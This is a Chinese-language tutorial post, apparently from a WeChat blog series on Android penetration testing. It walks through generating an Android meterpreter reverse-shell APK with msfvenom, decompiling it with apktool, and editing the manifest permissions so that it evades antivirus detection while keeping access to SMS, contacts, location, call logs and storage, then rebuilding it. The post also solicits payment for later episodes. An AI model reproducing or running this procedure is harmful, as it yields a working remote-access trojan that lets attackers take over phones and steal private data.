欢迎回来,安卓渗透继续连载
Pay Your Attention:
受疫情影响,是一段比较好的学习时间,应一些小伙伴要求出一个比较系统的安卓渗透测试教程,本来想无偿的推送给小伙伴们,但
于是,随意打赏页面中所示任意金额即可获取后面所有的安卓渗透教程,教程偏小白,适合入门,教程还未写完,打赏之后记得私聊我,见谅!见谅!见谅
享受这一刻,希望可以帮助到你
首先需要先生成一个安卓有效载荷,使用msfvenom生成
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 > permission.apk
安装APKTool
apt-get install apktool
使用安装好的APKTool对生成的安卓有效载荷进行反编译
apktool d -f permission.apk
查看反编译出来的文件夹,和APK同名
看到有一个名为AndroidManifest.xml的xml文件,里面有相关的权限信息
删掉一些不大需要,不大相关而且比较关键的权限,比如发送短信,录音,写入联系人,设置壁纸之类的
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.SET_WALLPAPER"/>
<uses-permission android:name="android.permission.WRITE_CONTACTS"/>
修改完大致如下,注意需要保留写入文件的权限,确保可以上传,下载文件
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-feature android:name="android.hardware.microphone"/>
修改完成保存文件,删除之前生成的permission文件
rm permission.apk
使用APKTool进行编译
apktool b -f permission/
可以在路径permission/dist中找到编译好的APK文件
尝试杀软检测就不放图片了
免费连载就到这边,可以打赏任意金额获取后续教程
原创不易,帮我点点右下角的“在看”吧,欢迎转发跟同行分享,谢谢
原文始发于微信公众号(Kali渗透测试教程):【安卓渗透测试系列教程第四期】权限编辑过杀软
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论